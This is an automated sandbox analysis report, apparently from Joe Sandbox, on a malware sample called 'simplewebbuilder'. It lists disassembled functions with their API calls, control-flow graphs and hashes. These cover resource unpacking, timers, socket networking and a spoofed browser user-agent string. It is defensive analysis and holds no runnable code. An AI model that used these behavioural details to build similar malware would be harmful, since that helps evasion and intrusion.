                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 009B1D59
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1D6B
                                                                                                                            • __beginthreadex.LIBCMT ref: 009B1DB1
                                                                                                                            • GetLastError.KERNEL32 ref: 009B1DC6
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B1DDD
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009B1DEC
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009B1E14
                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009B1E1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                                            • API String ID: 4246062733-3017686385
                                                                                                                            • Opcode ID: bca151b31aaa255c44aa2a02c448c4a9ddf575746b7bf549b463fb4836d4642b
                                                                                                                            • Instruction ID: 253e558e9593d92f254f984aa0376e7735be7c9de4942c4182a67e2b62576646
                                                                                                                            • Opcode Fuzzy Hash: bca151b31aaa255c44aa2a02c448c4a9ddf575746b7bf549b463fb4836d4642b
                                                                                                                            • Instruction Fuzzy Hash: 153181719043019FD710EF24C889BABBBE8EF84760F14492EF95597292DB70DD49CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B4E9A Relevance: 16.8, APIs: 11, Instructions: 256COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B4E9F
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4ECB
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4ED7
                                                                                                                              • Part of subcall function 009B4D01: __EH_prolog.LIBCMT ref: 009B4D06
                                                                                                                              • Part of subcall function 009B4D01: InterlockedExchange.KERNEL32(?,00000000), ref: 009B4E06
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4FA7
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4FAD
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B4FB4
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B4FBA
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B51BB
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B51C1
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B51CC
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B51D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2062355503-0
                                                                                                                            • Opcode ID: 32119602c93f36e1a826fa5b6bcab4e430b13288262f6222512b73649d82ac3e
                                                                                                                            • Instruction ID: 1893d0f0bcb09a2a48eaf41cb4529b39ce209ca8119dc9a0a65b93e133339691
                                                                                                                            • Opcode Fuzzy Hash: 32119602c93f36e1a826fa5b6bcab4e430b13288262f6222512b73649d82ac3e
                                                                                                                            • Instruction Fuzzy Hash: A9B18A71D0525DDEDF21DFA4C940BEEBBB9AF44324F14405AE408B7282DB746A89CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 473 401f64-401f84 FindResourceA 474 401f86-401f9d GetLastError SizeofResource 473->474 475 401f9f-401fa1 473->475 474->475 476 401fa6-401fec LoadResource LockResource GlobalAlloc call 402ab0 * 2 474->476 477 402096-40209a 475->477 482 401fee-401ff9 476->482 482->482 483 401ffb-402003 GetTickCount 482->483 484 402032-402038 483->484 485 402005-402007 483->485 486 402053-402083 GlobalAlloc call 401c26 484->486 487 40203a-40204a 484->487 485->486 488 402009-40200f 485->488 493 402088-402093 486->493 489 40204c 487->489 490 40204e-402051 487->490 488->486 492 402011-402023 488->492 489->490 490->486 490->487 494 402025 492->494 495 402027-40202a 492->495 493->477 494->495 495->492 496 40202c-40202e 495->496 496->488 497 402030 496->497 497->486
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32 ref: 00401F7A
                                                                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 564119183-0
                                                                                                                            • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                            • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                            • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B81C6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 498 9b81c6-9b81c7 499 9b81c9-9b8202 498->499 500 9b8153-9b8156 498->500 502 9b8267-9b827f 499->502 503 9b8204-9b822f 499->503 504 9b6cfb-9b6cfd 500->504 505 9b6cf4-9b6cf9 500->505 503->502 506 9b6d0a-9b6d3e RtlEnterCriticalSection RtlLeaveCriticalSection 504->506 507 9b6cff 504->507 508 9b6d04 Sleep 505->508 509 9b6d8e 506->509 510 9b6d40-9b6d4c 506->510 507->508 508->506 511 9b6d92 509->511 510->509 512 9b6d4e-9b6d5b 510->512 511->500 513 9b6d5d-9b6d61 512->513 514 9b6d63-9b6d64 512->514 515 9b6d68-9b6d8c call 9c50f0 * 2 513->515 514->515 515->511
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 009B6D04
                                                                                                                            • RtlEnterCriticalSection.NTDLL(009E81E8), ref: 009B6D0F
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(009E81E8), ref: 009B6D20
                                                                                                                            • _memset.LIBCMT ref: 009B6D75
                                                                                                                            • _memset.LIBCMT ref: 009B6D84
                                                                                                                            Strings
                                                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 009B6D35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection_memset$EnterLeaveSleep
                                                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                            • API String ID: 2085062160-1923541051
                                                                                                                            • Opcode ID: c80b2428e8ee24bf637e0e68d1e6187aaab405c761c9293398823c7a0ed9a28f
                                                                                                                            • Instruction ID: 09562d7f72406b35bd680d880724d4cffa3bdd3d7d97b6d6d38080d5b94cd614
                                                                                                                            • Opcode Fuzzy Hash: c80b2428e8ee24bf637e0e68d1e6187aaab405c761c9293398823c7a0ed9a28f
                                                                                                                            • Instruction Fuzzy Hash: E031467290D341ABD7119B24DD01BCBBBE4EF87720F11486AED82AB242C724AC46C782
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B26DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 520 9b26db-9b2726 RtlEnterCriticalSection 521 9b2728-9b2736 CreateWaitableTimerA 520->521 522 9b277e-9b2781 520->522 523 9b275b-9b2778 SetWaitableTimer 521->523 524 9b2738-9b2756 GetLastError call 9c1110 call 9b1712 521->524 525 9b2783-9b2798 call 9c414c 522->525 526 9b27d5-9b27f0 RtlLeaveCriticalSection 522->526 523->522 524->523 531 9b27ca 525->531 532 9b279a-9b27ac call 9c414c 525->532 535 9b27cc-9b27d0 call 9b83f9 531->535 538 9b27b9 532->538 539 9b27ae-9b27b7 532->539 535->526 540 9b27bb-9b27c3 call 9b1cf8 538->540 539->540 542 9b27c8 540->542 542->535
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 009B2706
                                                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009B272B
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D6153), ref: 009B2738
                                                                                                                              • Part of subcall function 009B1712: __EH_prolog.LIBCMT ref: 009B1717
                                                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009B2778
                                                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 009B27D9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                            • String ID: timer
                                                                                                                            • API String ID: 4293676635-1792073242
                                                                                                                            • Opcode ID: 6c096e1800fb8bfde4be5f3f2059087204c432c9c7a3eca99482df4e574fb35b
                                                                                                                            • Instruction ID: a7f185048481b25f9834decebc078a86c50a1128430a7ec6ece0c9b237a3dd53
                                                                                                                            • Opcode Fuzzy Hash: 6c096e1800fb8bfde4be5f3f2059087204c432c9c7a3eca99482df4e574fb35b
                                                                                                                            • Instruction Fuzzy Hash: B731C1B1909701AFD310DF65CA84B97BBE8FB48720F004A2EF95583681DB70E844CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 571 9b2b95-9b2baf 572 9b2bb1-9b2bb9 call 9c1110 571->572 573 9b2bc7-9b2bcb 571->573 581 9b2bbf-9b2bc2 572->581 575 9b2bdf 573->575 576 9b2bcd-9b2bd0 573->576 577 9b2be2-9b2c11 WSASetLastError WSARecv call 9baaff 575->577 576->575 579 9b2bd2-9b2bdd call 9c1110 576->579 584 9b2c16-9b2c1d 577->584 579->581 585 9b2d30 581->585 586 9b2c1f-9b2c2a call 9c1110 584->586 587 9b2c2c-9b2c32 584->587 588 9b2d32-9b2d38 585->588 597 9b2c3f-9b2c42 586->597 590 9b2c46-9b2c48 587->590 591 9b2c34-9b2c39 call 9c1110 587->591 594 9b2c4a-9b2c4d 590->594 595 9b2c4f-9b2c60 call 9c1110 590->595 591->597 599 9b2c66-9b2c69 594->599 595->588 595->599 597->590 601 9b2c6b-9b2c6d 599->601 602 9b2c73-9b2c76 599->602 601->602 603 9b2d22-9b2d2d call 9b1996 601->603 602->585 604 9b2c7c-9b2c9a call 9c1110 call 9b166f 602->604 603->585 611 9b2cbc-9b2cfa WSASetLastError select call 9baaff 604->611 612 9b2c9c-9b2cba call 9c1110 call 9b166f 604->612 617 9b2d08 611->617 618 9b2cfc-9b2d06 call 9c1110 611->618 612->585 612->611 621 9b2d0a-9b2d12 call 9c1110 617->621 622 9b2d15-9b2d17 617->622 626 9b2d19-9b2d1d 618->626 621->622 622->585 622->626 626->577
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2BE4
                                                                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 009B2C07
                                                                                                                              • Part of subcall function 009BAAFF: WSAGetLastError.WS2_32(00000000,?,?,009B2A51), ref: 009BAB0D
                                                                                                                            • WSASetLastError.WS2_32 ref: 009B2CD3
                                                                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 009B2CE7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Recvselect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 886190287-280543908
                                                                                                                            • Opcode ID: 22144ce9fe6fe0fd30735be3b5bf440b3910d50736d26876043cf0956c153498
                                                                                                                            • Instruction ID: de23cc31708e7c1eacaf1fd542ff4142d827c7c69502595c99d3d29e56036845
                                                                                                                            • Opcode Fuzzy Hash: 22144ce9fe6fe0fd30735be3b5bf440b3910d50736d26876043cf0956c153498
                                                                                                                            • Instruction Fuzzy Hash: 59416DB19083018FD7109F64C6057ABBBE8EFC9364F240D1EE599C7292EB74D9409B92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 679 9b1ba7-9b1bcf call 9d59f0 RtlEnterCriticalSection 682 9b1be9-9b1bf7 RtlLeaveCriticalSection call 9be926 679->682 683 9b1bd1 679->683 686 9b1bfa-9b1c20 RtlEnterCriticalSection 682->686 684 9b1bd4-9b1be0 call 9b1b79 683->684 689 9b1be2-9b1be7 684->689 690 9b1c55-9b1c6e RtlLeaveCriticalSection 684->690 688 9b1c34-9b1c36 686->688 691 9b1c38-9b1c43 688->691 692 9b1c22-9b1c2f call 9b1b79 688->692 689->682 689->684 694 9b1c45-9b1c4b 691->694 692->694 697 9b1c31 692->697 694->690 696 9b1c4d-9b1c51 694->696 696->690 697->688
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B1BAC
                                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 009B1BBC
                                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
                                                                                                                            • RtlEnterCriticalSection.NTDLL ref: 009B1C13
                                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 009B1C56
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1633115879-0
                                                                                                                            • Opcode ID: 3901d00592ce9cf4634026cef35dadf26412d9afa2f583da1c8a3588d92001c5
                                                                                                                            • Instruction ID: b1dc68e7932e026fad1d909d2b26355aa75629689cf29e495c749e095b83e1bb
                                                                                                                            • Opcode Fuzzy Hash: 3901d00592ce9cf4634026cef35dadf26412d9afa2f583da1c8a3588d92001c5
                                                                                                                            • Instruction Fuzzy Hash: 3821BC75A44614EFCB14CF64CA44B9ABBB8FF88320F10854AE84597302DB74ED45CBE0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403112 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32 ref: 00403138
                                                                                                                              • Part of subcall function 0040344A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 0040344A: HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00403186
                                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 004031B1
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004031D4
                                                                                                                              • Part of subcall function 0040322D: ExitProcess.KERNEL32 ref: 0040324A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2057626494-0
                                                                                                                            • Opcode ID: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction ID: 617ad2e6012ff9c1e059bad989762b11f9743b1554ab2ac8c32517e064b37c31
                                                                                                                            • Opcode Fuzzy Hash: 8f2434dccbb946e1aa19783ada8617482036cddac3ff7d4744445e81474f0da6
                                                                                                                            • Instruction Fuzzy Hash: E2217CB1940615AADB04EFB6DE46A6E7BB8EB45714F10413EF605BB2D1DB384900CBAC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2EEE
                                                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009B2EFD
                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 009B2F0C
                                                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 009B2F36
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2093263913-0
                                                                                                                            • Opcode ID: 6cb573b8b201e14808e7d33867967d17c4baab3b7b0c0590095f8823a4cbad80
                                                                                                                            • Instruction ID: fa9dc3ff527bb9413da35f1d7ab9e177ab745c8a978bfdbba0d3ebf649cdefe4
                                                                                                                            • Opcode Fuzzy Hash: 6cb573b8b201e14808e7d33867967d17c4baab3b7b0c0590095f8823a4cbad80
                                                                                                                            • Instruction Fuzzy Hash: 5501DD71511204BBDB205F65DC49F9BBBBCDB85771F00855AFA18C7152C77088009770
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009B2D39: WSASetLastError.WS2_32(00000000), ref: 009B2D47
                                                                                                                              • Part of subcall function 009B2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009B2D5C
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2E6D
                                                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 009B2E83
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Sendselect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 2958345159-280543908
                                                                                                                            • Opcode ID: 71fc013ac720faa55a57bb57a9fe22590385bf7ce5b1acd99f44d7b969b246ed
                                                                                                                            • Instruction ID: 49ee2beb84bedb434ffeed162c8e2363c8cbe2fd1b9e82c6ddfcc3b85d64f003
                                                                                                                            • Opcode Fuzzy Hash: 71fc013ac720faa55a57bb57a9fe22590385bf7ce5b1acd99f44d7b969b246ed
                                                                                                                            • Instruction Fuzzy Hash: F831E370E002099FDF04DF64CA06BEEBBA9EF893A4F144959E90497281E774D9408BA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2AEA
                                                                                                                            • connect.WS2_32(?,?,?), ref: 009B2AF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastconnect
                                                                                                                            • String ID: 3'
                                                                                                                            • API String ID: 374722065-280543908
                                                                                                                            • Opcode ID: 471195ad5d96b09c8ca19ff24d8d80cb52346f869e79bdbea98ae9589b0723ef
                                                                                                                            • Instruction ID: 10a42485a8ddf2401ab3784a3c9117bdd50dd67ad628ac219a38113196871b32
                                                                                                                            • Opcode Fuzzy Hash: 471195ad5d96b09c8ca19ff24d8d80cb52346f869e79bdbea98ae9589b0723ef
                                                                                                                            • Instruction Fuzzy Hash: 5921D770E04214ABCF14EFA4C515BFEBBB9EF85330F14855DE91897281EB748A019B91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CommandLineToArgvW.SHELL32 ref: 0040D869
                                                                                                                            • GetLocalTime.KERNEL32(0040C2C0), ref: 0040DA36
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArgvCommandLineLocalTime
                                                                                                                            • String ID: XiM#
                                                                                                                            • API String ID: 561774760-2404075716
                                                                                                                            • Opcode ID: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction ID: c9dd54a2f6a0a9ef6b395da460124d2a44ef0955a0893859fe936c8b588cfaf7
                                                                                                                            • Opcode Fuzzy Hash: 0df2924218fad12925b943659978a5563a1b0cbfaf9f247c4eee1228d6f38543
                                                                                                                            • Instruction Fuzzy Hash: 70D0C935C08102EBC2106BE59A4906876A1AB59355721053BE183F26E0DF78444AEA2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: b44cf503c9a6a02115bde214402ea20193f8ff1d5de99deccdce12a8a6d72dc0
                                                                                                                            • Instruction ID: 9d6a61312b61128debbcf17588de47d25a51754fb3a60cff99a69f493231877c
                                                                                                                            • Opcode Fuzzy Hash: b44cf503c9a6a02115bde214402ea20193f8ff1d5de99deccdce12a8a6d72dc0
                                                                                                                            • Instruction Fuzzy Hash: AF513AB1904216DFCB18DF68D542BAABBA4FF48320F14C55EF8299B391D774AA10CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 009B36A7
                                                                                                                              • Part of subcall function 009B2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009B2432
                                                                                                                              • Part of subcall function 009B2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 009B2445
                                                                                                                              • Part of subcall function 009B2420: RtlEnterCriticalSection.NTDLL(?), ref: 009B2454
                                                                                                                              • Part of subcall function 009B2420: InterlockedExchange.KERNEL32(?,00000001), ref: 009B2469
                                                                                                                              • Part of subcall function 009B2420: RtlLeaveCriticalSection.NTDLL(?), ref: 009B2470
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1601054111-0
                                                                                                                            • Opcode ID: d48dcb2407a0e90d5dfb5a52250fbae6f306e02accbfe2175274b87d8be17981
                                                                                                                            • Instruction ID: fe3c05b283f3cd3840ea50a2fb723ff97afb3ced370b663972eb71f187087745
                                                                                                                            • Opcode Fuzzy Hash: d48dcb2407a0e90d5dfb5a52250fbae6f306e02accbfe2175274b87d8be17981
                                                                                                                            • Instruction Fuzzy Hash: 5011C1F5104209ABDF21CF54CD86FEA3B69EF40770F108416FA12862A0CB34DA609B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C26F0 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __beginthreadex.LIBCMT ref: 009C2706
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,009BAF7F,00000000), ref: 009C2737
